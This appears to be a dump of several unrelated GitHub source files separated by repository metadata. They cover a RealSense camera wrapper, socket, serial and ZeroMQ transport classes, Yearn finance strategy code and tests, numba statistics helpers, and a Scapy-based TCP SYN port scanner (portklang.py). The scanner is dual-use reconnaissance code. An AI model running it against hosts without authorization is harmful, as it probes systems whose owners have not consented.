self.config.enable_stream(rs.stream.depth, resolution[0], resolution[1], rs.format.z16, fps)
self.config.enable_stream(rs.stream.color, resolution[0], resolution[1], rs.format.bgr8, fps)
self.pipe.start(self.config)
def _update(self):
while True:
frames = self.pipe.wait_for_frames()
self.color_frame = frames.get_color_frame()
self.depth_frame = frames.get_depth_frame()
if not self.color_frame or not self.depth_frame:
continue
return
def get_color_frame(self):
self._update()
return self.color_frame
def get_color_image(self):
self.color_image = np.asanyarray(self.get_color_frame().get_data())
return self.color_image
def get_depth_frame(self):
self._update()
return depth_frame
def get_depth_image(self):
self.depth_image = np.asanyarray(self.get_depth_frame().get_data())
return self.depth_image
def get_colormap(self, alpha=0.03, colormap=cv2.COLORMAP_JET):
return cv2.applyColorMap(cv2.convertScaleAbs(self.get_depth_image(), alpha=alpha), colormap)
def apply_colormap(self, image, alpha=0.03, colormap=cv2.COLORMAP_JET):
return cv2.applyColorMap(cv2.convertScaleAbs(image, alpha=alpha), colormap)
def get_combined_image(self):
self._update()
return np.hstack((np.asanyarray(self.color_frame.get_data()), np.asanyarray(self.depth_frame.get_data())))
def stop(self):
self.pipe.stop()
``` |
{
"source": "0xJeremy/FireEye",
"score": 3
} |
#### File: lib/FireEye/FireEye.py
```python
import socket
from threading import Thread, Lock
import cv2
import base64
from json import dumps as dictToJson
from json import loads as jsonToDict
STOP = 'STOP'.encode()
ACK = 'ACK'
NEWLINE = '\n'.encode()
IMG_MSG_S = '{"type": "image", "data": "'.encode()
IMG_MSG_E = '"}'.encode()
class FireEye(Thread):
def __init__(self, addr='127.0.0.1', port=8080):
super(FireEye, self).__init__()
self.addr = addr
self.port = port
self.canWrite = True
self.channels = {}
self.lock = Lock()
self.open()
self.start()
def open(self):
while True:
try:
self.client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.client.connect((self.addr, self.port))
return
except: continue
def run(self, size=256):
tmp = ''
while True:
tmp += self.client.recv(size).decode()
try:
msg = jsonToDict(tmp)
if STOP in msg.keys():
self.client.close()
return
self.channels[msg['type']] = msg['data']
if(msg['type'] == ACK):
self.canWrite = True
tmp = ''
except: continue
def get(self, channel):
if channel in self.channels.keys():
return self.channels[channel]
return None
def encodeImg(self, img):
success, encoded_img = cv2.imencode('.png', img)
return base64.b64encode(encoded_img)
def writeLock(self, channel, data):
with self.lock:
self.write(channel, data)
def write(self, channel, data):
if self.canWrite:
self.canWrite = False
msg = {'type': channel, 'data': data}
self.client.sendall(dictToJson(msg).encode() + NEWLINE)
def writeImgLock(self, data):
with self.lock:
self.writeImg(data)
def writeImg(self, data):
if self.canWrite:
self.canWrite = False
msg = IMG_MSG_S + self.encodeImg(data) + IMG_MSG_E
self.client.sendall(msg + NEWLINE)
def exit(self):
self.client.send(STOP)
``` |
{
"source": "0xJeremy/serial.engine",
"score": 3
} |
#### File: python/serialengine/transport.py
```python
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
import serial
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, READY
from .constants import TYPE, DATA
from .constants import TIMEOUT, SIZE
from .constants import STATUS, CLOSING
from .constants import BAUD_RATE
###############################################################
########################
### CONNECTION CLASS ###
########################
class Transport:
def __init__(self, port, baud=BAUD_RATE, timeout=TIMEOUT, size=SIZE, name=None):
self.name = name
self.canWrite = True
self.channels = {}
self.size = size
self.timeout = timeout
self.stopped = False
self.opened = False
self.port = port
self.baud = baud
self.serial = serial.Serial(port, baudrate=baud, timeout=self.timeout)
self.lock = Lock()
def __run(self):
tmp = ""
while True:
if self.stopped:
self.serial.close()
return
tmp += self.serial.read(self.size).decode()
if tmp == READY:
self.opened = True
tmp = ""
if tmp != "":
data = tmp.split("\n")
for i in range(len(data)):
try:
msg = jsonToDict(data[i])
except JSONDecodeError:
continue
self.__cascade(msg[TYPE], msg[DATA])
self.channels[msg[TYPE]] = msg[DATA]
data[i] = ""
tmp = "".join(data)
def __cascade(self, mtype, mdata):
if mtype == ACK:
self.canWrite = True
if mtype == STATUS:
if mdata == CLOSING:
self.__close()
return
def __close(self):
self.opened = False
self.stopped = True
#################
### INTERFACE ###
#################
def start(self):
Thread(target=self.__run, args=()).start()
while not self.opened:
pass
return self
def get(self, channel):
with self.lock:
if channel in self.channels.keys():
return self.channels[channel]
return None
def write(self, channel, data):
if self.opened:
with self.lock:
msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
self.serial.write(dictToJson(msg).encode() + NEWLINE)
def close(self):
self.write(STATUS, CLOSING)
self.__close()
``` |
{
"source": "0xJeremy/socket.engine",
"score": 3
} |
#### File: lib/socketengine/transport.py
```python
import socket
from threading import Thread, Lock
from json import dumps as dictToJson
from json import loads as jsonToDict
from json.decoder import JSONDecodeError
from .common import encodeImg, decodeImg, generateSocket
#################
### CONSTANTS ###
#################
from .constants import ACK, NEWLINE, IMG_MSG_S, IMG_MSG_E
from .constants import IMAGE, TYPE, DATA
from .constants import PORT, TIMEOUT, SIZE
from .constants import STATUS, CLOSING, NAME_CONN
from .constants import MAX_RETRIES
###############################################################
#######################
### TRANSPORT CLASS ###
#######################
class Transport:
TYPE_LOCAL = 1
TYPE_REMOTE = 2
def __init__(self, name, timeout=TIMEOUT, size=SIZE):
self.name = name
self.socket = None
self.addr, self.port = None, None
self.canWrite = True
self.channels = {}
self.timeout = timeout
self.size = size
self.stopped = False
self.opened = False
self.type = None
self.lock = Lock()
def receive(self, socket, addr, port):
self.socket = socket
self.addr = addr
self.port = port
self.socket.settimeout(self.timeout)
self.type = Transport.TYPE_REMOTE
self.opened = True
self.__start()
def __start(self):
if self.socket is None:
raise RuntimeError("Connection started without socket")
return
Thread(target=self.__run, args=()).start()
return self
def __run(self):
tmp = ""
while True:
if self.stopped:
self.socket.close()
return
try:
tmp += self.socket.recv(self.size).decode()
except socket.timeout:
continue
except OSError:
self.close()
if tmp != "":
data = tmp.split("\n")
for i in range(len(data)):
try:
msg = jsonToDict(data[i])
except JSONDecodeError:
continue
self.__cascade(msg[TYPE], msg[DATA])
if msg[TYPE] == IMAGE:
self.channels[IMAGE] = decodeImg(msg[DATA])
else:
self.channels[msg[TYPE]] = msg[DATA]
data[i] = ""
tmp = "".join(data)
def __cascade(self, mtype, mdata):
if mtype == ACK:
self.canWrite = True
if mtype == STATUS:
if mdata == CLOSING:
self.__close()
if mtype == NAME_CONN:
self.name = mdata
if mtype == IMAGE:
self.write(ACK, ACK)
def __close(self):
self.opened = False
self.stopped = True
#################
### INTERFACE ###
#################
def connect(self, name, addr, port):
self.name = name
self.addr = addr
self.port = port
while True:
try:
self.socket = generateSocket(self.timeout)
self.socket.connect((self.addr, self.port))
break
except socket.timeout:
continue
except socket.gaierror:
continue
except OSError as e:
if type(e) == ConnectionRefusedError:
continue
raise RuntimeError("Socket address in use: {}".format(e))
return
self.type = Transport.TYPE_LOCAL
self.opened = True
self.write(NAME_CONN, self.name)
self.__start()
def get(self, channel):
with self.lock:
if channel in self.channels.keys():
return self.channels[channel]
return None
def getImg(self):
if IMAGE in self.channels.keys():
return self.channels[IMAGE]
return None
def write(self, channel, data):
if self.opened:
with self.lock:
msg = {TYPE: channel.replace("\n", ""), DATA: data.replace("\n", "")}
self.socket.sendall(dictToJson(msg).encode() + NEWLINE)
def writeImg(self, data):
if self.canWrite and self.opened:
with self.lock:
self.canWrite = False
self.socket.sendall(IMG_MSG_S + encodeImg(data) + IMG_MSG_E + NEWLINE)
def close(self):
try:
self.write(STATUS, CLOSING)
except OSError:
pass
self.__close()
```
#### File: python/socketengine/transport.py
```python
from threading import Thread, Lock, Event
from zlib import compress, decompress
import time
import zmq
from google import protobuf
from .engine_commons import getUUID, getOpenPort, baseToPubSubPort
from .message_pb2 import SocketMessage
#################
### CONSTANTS ###
#################
from .constants import DELIMITER, ACK
CONN_REQUEST = b'portplease'
BASE_PORT = 8484
################################################################
#######################
### TRANSPORT CLASS ###
#######################
# pylint: disable=too-many-instance-attributes, fixme
class Transport:
# pylint: disable=invalid-name
DIRECT = 1
SUBSCRIBER = 2
BOTH = 3
# pylint: disable=bad-continuation
def __init__(
self,
context=zmq.Context(),
# router=None,
timeout=10, # milliseconds
compression=False,
requireAcknowledgement=True,
basePort=BASE_PORT,
):
self.context = context
# self.router = router # TODO: Add plugin capability
self.timeout = timeout
self.useCompression = compression
self.requireAcknowledgement = requireAcknowledgement
self.pairRoutingPort = basePort
self.pubsubPort = baseToPubSubPort(basePort)
self._topics = {}
self._callbacks = {}
self._topicEvents = {}
self._awaitingAcknowledgement = {}
self.parseLock = Lock()
self._directConnectionsLock = Lock()
self._closeEvent = Event()
self._directConnections = {}
self._routingSocket = None
self._subscriber = None
self._publisher = None
self._pairHost = None
self.stopped = False
self.started = False
########################
### HELPER FUNCTIONS ###
########################
def _generateBoundSocket(self, socketType, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.bind('tcp://*:{}'.format(port))
return socket
def _generateConnectSocket(self, socketType, address, port):
socket = self.context.socket(socketType)
socket.RCVTIMEO = self.timeout # in milliseconds
socket.connect('tcp://{}:{}'.format(address, port))
return socket
def _ensurePublisher(self):
if self._publisher is not None:
return
# pylint: disable=no-member
self._publisher = self._generateBoundSocket(zmq.PUB, self.pubsubPort)
def _ensureSubscriber(self):
if self._subscriber is not None:
return
# pylint: disable=no-member
self._subscriber = self.context.socket(zmq.SUB)
self._subscriber.RCVTIMEO = self.timeout # in milliseconds
def _connectSubscriber(self, address, port):
# If the user specifies an override port, use that; otherwise use default
port = port or self.pubsubPort
self._subscriber.connect('tcp://{}:{}'.format(address, port))
# Returns serialized string message
def _createSocketMessage(self, topic, data, acknowledgement=False):
message = SocketMessage()
message.type = topic
message.data = data
if acknowledgement:
message.acknowledge = True
self._awaitingAcknowledgement[topic] = Event()
serialized = message.SerializeToString()
if self.useCompression:
serialized = compress(serialized)
return serialized
##########################
### CONNECTION HELPERS ###
##########################
def _directConnect(self, address, targetBasePort):
# TODO: Fix this behavior, appears (and is) fragile
if self.pairRoutingPort is None:
targetBasePort = self.pairRoutingPort
socket = self._requestNewConnection(address, targetBasePort)
uuid = getUUID()
self._directConnections[uuid] = socket
return uuid
# pylint: disable=no-member
def _requestNewConnection(self, address, port):
socket = self._generateConnectSocket(zmq.REQ, address, port)
socket.send(CONN_REQUEST)
# TODO: Better define this behavior
while True:
try:
port = socket.recv().decode()
break
except zmq.error.Again:
continue
socket.close()
return self._generateConnectSocket(zmq.PAIR, address, port)
def _handleConnectionRequests(self, address, request):
if request != CONN_REQUEST:
raise RuntimeError('Received a connection request without appropriate metadata')
openPort = getOpenPort()
self._directConnections[getUUID()] = self._generateBoundSocket(zmq.PAIR, openPort)
self._routingSocket.send_multipart(
[address, b'', '{}'.format(openPort).encode(),]
)
#####################
### MAIN RUN LOOP ###
#####################
def _run(self):
while True:
if self.stopped:
self._close()
return
try:
address, _, request = self._routingSocket.recv_multipart()
self._handleConnectionRequests(address, request)
except zmq.error.Again:
pass
for socket in list(self._directConnections.values()):
try:
message = socket.recv()
self._handleMessage(message, socket)
except zmq.error.Again:
pass
if self._subscriber:
try:
message = self._subscriber.recv()
self._handleSubscriptionMessage(message)
except zmq.error.Again:
pass
# pylint: disable=no-member
def _handleMessage(self, rawMessage, socket=None):
message = SocketMessage()
try:
message.ParseFromString(rawMessage)
except protobuf.message.DecodeError:
message.ParseFromString(decompress(rawMessage))
# TODO: Implement metadata cascade
# self._metadataCascade(message)
# Parse message topic (type)
if message.data != '':
if message.data == ACK:
if self._awaitingAcknowledgement.get(message.type, False):
self._awaitingAcknowledgement[message.type].set()
return
self._topics[message.type] = message.data
# Fire any registered callbacks
if self._callbacks.get(message.type, False):
self._callbacks[message.type](self, message.type, message.data)
# Resolve any waiting events
if self._topicEvents.get(message.type, False):
self._topicEvents[message.type].set()
# Send an acknowledgement if required
# pylint: disable=singleton-comparison
if message.acknowledge == True:
self._sendAcknowledgement(socket, message.type)
def _handleSubscriptionMessage(self, rawMessage):
# TODO: Validate this approach
self._handleMessage(rawMessage.split(DELIMITER)[1])
def _sendMessage(self, message, routingID=None):
if routingID is None:
for socket in list(self._directConnections.values()):
# TODO: This is not good, but makes things work. Invesgiate better methods.
time.sleep(0.005)
socket.send(message)
return
socket = self._directConnections[routingID]
if socket is None:
raise RuntimeError('Unable to send message to route ID; connection does not exist')
socket.send(message)
def _sendAcknowledgement(self, socket, topic):
socket.send(self._createSocketMessage(topic, ACK))
def _close(self):
self.started = False
for socket in list(self._directConnections.values()):
socket.close()
if self._publisher is not None:
self._publisher.close()
if self._subscriber is not None:
self._subscriber.close()
self._closeEvent.set()
######################
### CORE INTERFACE ###
######################
def start(self):
# Setup routing socket
# This will sometimes fail with `zmq.error.ZMQError: Permission denied`
# TODO: Add resiliance to this
self._routingSocket = self._generateBoundSocket(zmq.ROUTER, self.pairRoutingPort)
# Start thread
Thread(target=self._run, args=()).start()
self.started = True
return self
def connect(self, address, targetBasePort=None, connectionTypes=1):
if not isinstance(connectionTypes, list):
connectionTypes = [connectionTypes]
uuid = None
if Transport.DIRECT in connectionTypes:
uuid = self._directConnect(address, targetBasePort)
if Transport.SUBSCRIBER in connectionTypes:
self._ensureSubscriber()
self._connectSubscriber(address, targetBasePort)
return uuid
def publish(self, topic, data):
# Ensure publisher exists, then push messages
self._ensurePublisher()
message = self._createSocketMessage(topic, data)
self._publisher.send(topic.encode() + DELIMITER + message)
def subscribe(self, topic):
# Ensure a subscriber exists and subscribe
self._ensureSubscriber()
self._subscriber.subscribe(topic)
def send(self, topic, data, routingID=None):
self._sendMessage(
self._createSocketMessage(topic, data, self.requireAcknowledgement), routingID
)
if self.requireAcknowledgement:
self._awaitingAcknowledgement[topic].wait()
def get(self, topic):
return self._topics.get(topic, None)
def registerCallback(self, topic, function):
self._callbacks[topic] = function
def close(self):
self.stopped = True
self._closeEvent.wait()
#########################
### INTERFACE HELPERS ###
#########################
def waitForMessageOnTopic(self, topic):
if self.get(topic) is not None:
return
self.waitForNewMessageOnTopic(topic)
def waitForNewMessageOnTopic(self, topic):
event = Event()
self._topicEvents[topic] = event
event.wait()
self._topicEvents[topic] = None
``` |
{
"source": "0xJeremy/web-templates",
"score": 3
} |
#### File: dependencies/python/comm.py
```python
import socket
from datetime import datetime
from json import dumps as stringToJSON
SOCKET_PATH = '/tmp/node-python-sock'
def generateTime():
t = datetime.now()
return '{}{}Z'.format(t.strftime('%Y-%m-%dT%H:%M:%S.'), t.strftime('%f')[0:3])
class comm():
def __init__(self, path=None):
self.numSent = 0
self.sendHistory = []
self.path = path if path else SOCKET_PATH
self.client = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.client.connect(self.path)
def send(self, data):
msg = {'time': generateTime(),
'data': stringToJSON(data)}
jsonMsg = stringToJSON(msg)
self.client.send(jsonMsg.encode())
self.sendHistory.append(msg)
self.numSent += 1
def close(self):
self.client.close()
``` |
{
"source": "0xK4gura/portklang.py",
"score": 3
} |
#### File: 0xK4gura/portklang.py/portklang.py
```python
from scapy.all import *
from socket import gethostbyname
from sys import argv
from os.path import exists
from os import getcwd
# Config
def config():
global port_range, report_close_ports, report_unestablished_ports, SYN, RST, ACK, timeout, targets
# Generate port range
port_range = [22, 23, 80, 443, 445, 8080]
# for x in range(1024):
# port_range.append(x+1)
# Settings reports
report_close_ports = False
report_unestablished_ports = False
# TCP Raw
SYN, RST, ACK = 0x02, 0x04, 0x10
# Timeout
timeout=.2
# Initiating
if len(sys.argv) != 2:
print("[X] Invalid arguments!\nUse '{} <List of Domains File>' ie. {} domains.txt".format(sys.argv[0],sys.argv[0]))
sys.exit()
else:
targets = sys.argv[1]
if exists(sys.argv[1]):
print("\n[-] Loaded '{}'\n".format(sys.argv[1]))
else:
print("\n[X] Mana ada file nama '{}' weh!\nTry check balik ada tak dalam '{}'".format(sys.argv[1], os.getcwd()))
exit()
print("""
█▀█ █▀█ █▀█ ▀█▀ █▄▀ █░░ ▄▀█ █▄░█ █▀▀
█▀▀ █▄█ █▀▄ ░█░ █░█ █▄▄ █▀█ █░▀█ █▄█
\t -made by n0vi\n""")
run()
# Running Program
def run():
with open(targets, "r") as file:
global iterator, duplicates_checker
duplicates_checker = []
iterator = 0
for target in file:
target = target.strip("\n")
if 'https://' in target:
target = target[8:]
elif 'http://' in target:
target = target[7:]
if '/' in target[-1]:
target = target[:-1]
if target in duplicates_checker:
print("\n[>>>] Skipping '{}' Reason: a duplicate".format(target))
else:
duplicates_checker.append(target)
global domain_ip
domain_ip = socket.gethostbyname(target)
print("[>] {} - Enumerating : {} ({})".format(iterator+1, target, domain_ip))
scan(target)
iterator += 1
# Port Scanning
def scan(target):
open_ports = []
for port in port_range:
tcp_connect = sr1(IP(dst=target)/TCP(sport=RandShort(), dport=port, flags="S"), timeout=timeout, verbose=False)
if tcp_connect and tcp_connect.haslayer(TCP):
response_flags = tcp_connect.getlayer(TCP).flags
if response_flags == (SYN + ACK):
snd_rst = send(IP(dst=target)/TCP(sport=RandShort(), dport=port, flags="AR"), verbose=False)
print("\t[O] {} is OPEN!".format(port))
open_ports.append(port)
elif response_flags== (RST + ACK):
print("\t[X] {} is CLOSED!".format(port)) if report_close_ports == True else print("",end="")
else:
print("\t[X] {} CLOSED due no connection established".format(port)) if report_unestablished_ports == True else print("",end="")
print("\n[!] Scan completed!\n\t[>>] Open ports for {} ({}) : {}\n".format(target, domain_ip, open_ports))
config()
print(">> Finished enumerating for {} websites".format(iterator))
``` |
{
"source": "0xkofee/yearn-exporter",
"score": 2
} |
#### File: yearn/v2/strategies.py
```python
import logging
import threading
import time
from typing import List
from eth_utils import encode_hex, event_abi_to_log_topic
from yearn.decorators import sentry_catch_all, wait_or_exit_after
from yearn.events import create_filter, decode_logs
from yearn.multicall2 import fetch_multicall
from yearn.utils import contract, safe_views
STRATEGY_VIEWS_SCALED = [
"maxDebtPerHarvest",
"minDebtPerHarvest",
"totalDebt",
"totalGain",
"totalLoss",
"estimatedTotalAssets",
"lentTotalAssets",
"balanceOfPool",
"balanceOfWant",
]
STRATEGY_EVENTS = ["Harvested"]
logger = logging.getLogger(__name__)
class Strategy:
def __init__(self, strategy, vault, watch_events_forever):
self.strategy = contract(strategy)
self.vault = vault
try:
self.name = self.strategy.name()
except ValueError:
self.name = strategy[:10]
self._views = safe_views(self.strategy.abi)
self._harvests = []
self._topics = [
[
encode_hex(event_abi_to_log_topic(event))
for event in self.strategy.abi
if event["type"] == "event" and event["name"] in STRATEGY_EVENTS
]
]
self._watch_events_forever = watch_events_forever
self._done = threading.Event()
self._has_exception = False
self._thread = threading.Thread(target=self.watch_events, daemon=True)
@property
def unique_name(self):
if [strategy.name for strategy in self.vault.strategies].count(self.name) > 1:
return f'{self.name} {str(self.strategy)[:8]}'
else:
return self.name
def __repr__(self) -> str:
return f"<Strategy {self.strategy} name={self.name}>"
def __eq__(self, other):
if isinstance(other, Strategy):
return self.strategy == other.strategy
if isinstance(other, str):
return self.strategy == other
raise ValueError("Strategy is only comparable with [Strategy, str]")
@sentry_catch_all
def watch_events(self):
start = time.time()
self.log_filter = create_filter(str(self.strategy), topics=self._topics)
while True:
logs = self.log_filter.get_new_entries()
events = decode_logs(logs)
self.process_events(events)
if not self._done.is_set():
self._done.set()
logger.info("loaded %d harvests %s in %.3fs", len(self._harvests), self.name, time.time() - start)
if not self._watch_events_forever:
return
time.sleep(300)
def process_events(self, events):
for event in events:
if event.name == "Harvested":
block = event.block_number
logger.debug("%s harvested on %d", self.name, block)
self._harvests.append(block)
@wait_or_exit_after
def load_harvests(self):
if not self._thread._started.is_set():
self._thread.start()
@property
def harvests(self) -> List[int]:
self.load_harvests()
return self._harvests
def describe(self, block=None):
results = fetch_multicall(
*[[self.strategy, view] for view in self._views],
[self.vault.vault, "strategies", self.strategy],
block=block,
)
info = dict(zip(self._views, results))
info.update(results[-1].dict())
for view in STRATEGY_VIEWS_SCALED:
if view in info:
info[view] = (info[view] or 0) / self.vault.scale
# unwrap structs
for view in info:
if hasattr(info[view], '_dict'):
info[view] = info[view].dict()
return info
``` |
{
"source": "0xkofee/yearn-lens",
"score": 2
} |
#### File: tests/tvl_adapters/test_tvl_adapter_earn.py
```python
import pytest
import brownie
from brownie import interface, ZERO_ADDRESS
from operator import itemgetter
yDaiV2Address = "0x16de59092dAE5CcF4A1E6439D611fd0653f0Bd01"
ethZapAddress = "0x5A0bade607eaca65A0FE6d1437E0e3EC2144d540"
@pytest.fixture
def earnTvlAdapter(
TvlAdapterEarn,
earnAddressesGenerator,
delegationMapping,
managementList,
oracle,
management,
):
return TvlAdapterEarn.deploy(
oracle, earnAddressesGenerator, delegationMapping, {"from": management},
)
def test_generator_info(earnTvlAdapter):
adapterInfo = earnTvlAdapter.adapterInfo()
assert adapterInfo[0] == earnTvlAdapter
assert adapterInfo[1] == "EARN"
assert adapterInfo[2] == "SAFE"
def test_asset_tvl_usdc(
earnTvlAdapter, earnAddressesGenerator, delegationMapping, management
):
# delegationMapping.updateDelegationStatusForAsset(
# cyDaiAddress, True, {"from": management}
# )
# earnAddressesGenerator.setAssetDeprecated(
# cyDaiAddress, True, {"From": management}
# )
assetsAddresses = earnTvlAdapter.assetsAddresses()
# for address in assetsAddresses:
# tvl = v2VaultsTvlAdapter.assetTvlUsdc(address) / 10 ** 12
# assert tvl > 0
# Print TVL per asset
print("--------")
print("Earn TVL")
print("--------")
totalTvl = 0
tvlList = []
for address in assetsAddresses:
token = interface.IERC20(address)
tvl = earnTvlAdapter.assetTvlUsdc(address) / 10 ** 6
totalTvl += tvl
tvlList.append({"symbol": token.symbol(), "tvl": tvl})
sortedTvlItems = sorted(tvlList, key=itemgetter("tvl"), reverse=True)
for item in sortedTvlItems:
print(item.get("symbol"), item.get("tvl"))
calculatedTotalTvl = earnTvlAdapter.assetsTvlUsdc() / 10 ** 6
assert round(calculatedTotalTvl) == round(totalTvl)
print("Total tvl", totalTvl)
def test_asset_tvl(earnTvlAdapter, delegationMapping, management):
# delegationMapping.updateDelegationStatusForAsset(
# cyDaiAddress, True, {"from": management}
# )
assetsAddresses = earnTvlAdapter.assetsAddresses()
# for address in assetsAddresses:
# tvl = earnAdapter.assetTvlUsdc(address) / 10 ** 12
# assert tvl > 0
# Print TVL per asset
print("------------------")
print("Earn TVL Breakdown")
print("------------------")
totalTvl = 0
tvlList = []
for address in assetsAddresses:
token = interface.IERC20(address)
print("address", address)
print(earnTvlAdapter.assetTvlBreakdown(address))
print("")
def test_assets_tvl(earnTvlAdapter):
tvl = earnTvlAdapter.assetsTvlBreakdown()
print(tvl)
``` |
{
"source": "0xku5ama/solana_candy_machine_tools",
"score": 3
} |
#### File: solana_candy_machine_tools/solana/candy_machine_stalker.py
```python
import requests
from time import sleep
candy_machines_contract = [
'cndy3Z4yapfJBmL3ShUp5exZKqR3z33thTzeNMm2gRZ']
s = set()
def handle_request(query):
resp = requests.get(query)
if resp.status_code == 200:
return resp.json()
else:
raise Exception('Http request died')
def handle_candy_machine_txn(contract, h):
print(f'Candy machine interaction at {h}')
resp = handle_request(f'https://public-api.solscan.io/transaction/{h}')
try:
for acc in resp['inputAccount']:
if acc['account'] != contract and not acc['signer']:
print(f'Candy machine address: {acc["account"]} on {contract}')
raw = resp['parsedInstruction'][0]['data']
if raw[0] == 'f':
print('Probably updating candy machine')
elif len(raw) > 40: # Likely upload NFT data
raw = raw[40:] # strip headers
end_of_name = raw.find('000000')
if end_of_name == -1:
print(f'Unknown data format, cannot find YY000000 open delimiter, please check txn: {h}')
return
if end_of_name % 2 != 0:
end_of_name += 1
end_of_link = raw.find('000000', end_of_name + 6)
if end_of_name == -1:
print(f'Unknown data format, cannot find XX000000 close delimiter, please check txn: {h}')
return
if end_of_link % 2 != 0:
end_of_link += 1
nft_name = bytearray.fromhex(raw[:end_of_name - 2]).decode()
nft_link = bytearray.fromhex(raw[end_of_name + 6:end_of_link - 2]).decode()
print(f'Name: {nft_name}\nArweave link: {nft_link}')
return
raise Exception('Unknown interaction')
except Exception as e:
print(f'Unknown interaction, please check txn: {h}')
def handle_candy_machine_birth(h):
print(f'New candy machine is born at {h}')
resp = handle_request(f'https://public-api.solscan.io/transaction/{h}')
candy_address = resp['parsedInstruction'][0]['params']['newAccount']
contract = resp['parsedInstruction'][0]['params']['programOwner']
print(f'New candy machine address {candy_address} on {contract}')
def process_txn(txn, contract):
h = txn['txHash']
if h in s:
return
s.add(h)
if len(txn['parsedInstruction']) != 1:
is_mint = False
for instruction in txn['parsedInstruction']:
is_mint = instruction['programId'] == 'TokenkegQfeZyiNwAJbNbGKPFXCWuBvf9Ss623VQ5DA'
if is_mint:
# print(f'NFT mint txn on {contract}')
return
if not is_mint:
if txn['parsedInstruction'][0]['type'] == 'createAccount' and txn['parsedInstruction'][1]['programId'] == contract:
handle_candy_machine_birth(h)
else:
handle_candy_machine_txn(contract, h)
print('')
def job():
try:
for contract in candy_machines_contract:
resp = handle_request(f'https://public-api.solscan.io/account/transactions?account={contract}&limit=10')
for txn in resp:
process_txn(txn, contract)
except Exception as e:
print(f'Http request failed due to {e}')
while True:
job()
sleep(5)
``` |
{
"source": "0xLeon/py-winenv-edit",
"score": 3
} |
#### File: py-winenv-edit/winenvedit/__init__.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import unicode_literals
import argparse
import sys
import elevate
import winenv
__version__ = '0.0.0'
def prepend_env_var(name, value, env=winenv.ENV_USER, *other):
winenv.append_env_var(name, value, True, ';', env)
def append_env_var(name, value, env=winenv.ENV_USER, *other):
winenv.append_env_var(name, value, False, ';', env)
def set_env_var(name, value, env=winenv.ENV_USER, overwrite=True, *other):
if value.upper() == 'PATH' and overwrite:
raise EnvironmentError('Overwriting the PATH environment variable is not supported. Use the append or prepend action instead.')
if len(value) == 0:
# TODO: implement deletion in winenv
pass
else:
winenv.set_env_var(name, value, overwrite=overwrite, env=env)
def main(argv=None):
actions = {
'set': set_env_var,
'prepend': prepend_env_var,
'append': append_env_var,
}
envs = [winenv.ENV_USER, winenv.ENV_SYSTEM]
p = argparse.ArgumentParser()
p.add_argument('action', choices=['set', 'prepend', 'append'], metavar='action')
p.add_argument('-m', '--system', action='store_true', dest='system')
p.add_argument('-f', '--force', action='store_true', dest='overwrite')
p.add_argument('vars', nargs='+', metavar='name=[value]')
args = p.parse_args(argv)
if not args.system or elevate.elevate():
for var in args.vars:
if '=' not in var:
print('Skipping invalid var {}'.format(var), file=sys.stderr)
continue
name, value = var.split('=', 1)
actions[args.action](name, value, envs[int(args.system)], args.overwrite)
``` |
{
"source": "0xleowang/Kaggle-Optiver-Solution",
"score": 2
} |
#### File: 0xleowang/Kaggle-Optiver-Solution/numba_functions.py
```python
import numpy as np
from numba import njit
# numba
@njit
def calc_wap_njit(bp1, ap1, bs1, as1):
return (bp1 * as1 + ap1 * bs1) / (bs1 + as1)
@njit
def prod_njit(a, b):
return np.multiply(a, b)
@njit
def rv_njit(values):
return np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
@njit
def sum_njit(a):
return np.sum(a)
@njit
def mean_njit(values):
return np.mean(values) if len(values) > 0 else 0
@njit
def mean_abs_njit(values):
return np.mean(np.abs(values)) if len(values) > 0 else 0
@njit
def std_njit(values):
return np.std(values) if len(values) > 0 else 0
@njit
def skew_njit(values):
return np.skew(values) if len(values) > 0 else 0
@njit
def min_njit(values):
return np.min(values) if len(values) > 0 else 0
@njit
def max_njit(values):
return np.max(values) if len(values) > 0 else 0
@njit
def q1_njit(values):
return np.quantile(values, q=0.25) if len(values) > 0 else 0
@njit
def q2_njit(values):
return np.quantile(values, q=0.50) if len(values) > 0 else 0
@njit
def q3_njit(values):
return np.quantile(values, q=0.75) if len(values) > 0 else 0
# for pandas
def rv_numba(values, index):
return np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
def rvp_numba(values, index):
return np.sqrt(np.sum(np.square(np.maximum(values, 0)))) if len(values) > 0 else 0
def rvn_numba(values, index):
return np.sqrt(np.sum(np.square(np.minimum(values, 0)))) if len(values) > 0 else 0
def bpv_numba(values, index):
mu1_sq = 2 / np.pi
return 1 / mu1_sq * np.sqrt(np.sum(np.abs(values[1:] * values[:-1]))) if len(values) > 1 else 0
def jv_numba(values, index):
mu1_sq = 2 / np.pi
rv = np.sqrt(np.sum(np.square(values))) if len(values) > 0 else 0
bpv = 1 / mu1_sq * np.sqrt(np.sum(np.abs(values[1:] * values[:-1]))) if len(values) > 1 else 0
return max(rv - bpv, 0)
def rq_numba(values, index):
scaler = len(values) / 3
return np.sqrt(np.sqrt(scaler * np.sum(np.power(values, 4)))) if len(values) > 0 else 0
def count_numba(values, index):
return len(values)
def sqrt_inv_count_numba(values, index):
return np.sqrt(1 / (1 + len(values)))
def sum_numba(values, index):
return np.sum(values) if len(values) > 0 else 0
def sqrt_inv_sum_numba(values, index):
return np.sqrt(1 / (1 + np.sum(values))) if len(values) > 0 else 0
def mean_numba(values, index):
return np.mean(values) if len(values) > 0 else 0
def mean_abs_numba(values, index):
return np.mean(np.abs(values)) if len(values) > 0 else 0
def std_numba(values, index):
return np.std(values) if len(values) > 0 else 0
def skew_numba(values, index):
return np.skew(values) if len(values) > 0 else 0
def min_numba(values, index):
return np.min(values) if len(values) > 0 else 0
def max_numba(values, index):
return np.max(values) if len(values) > 0 else 0
def q1_numba(values, index):
return np.quantile(values, q=0.25) if len(values) > 0 else 0
def q2_numba(values, index):
return np.quantile(values, q=0.50) if len(values) > 0 else 0
def q3_numba(values, index):
return np.quantile(values, q=0.75) if len(values) > 0 else 0
def ptp_numba(values, index):
return np.ptp(values) if len(values) > 0 else 0
def last_numba(values, index):
return values[-1] if len(values) > 0 else 0
def sum_sq_numba(values, index):
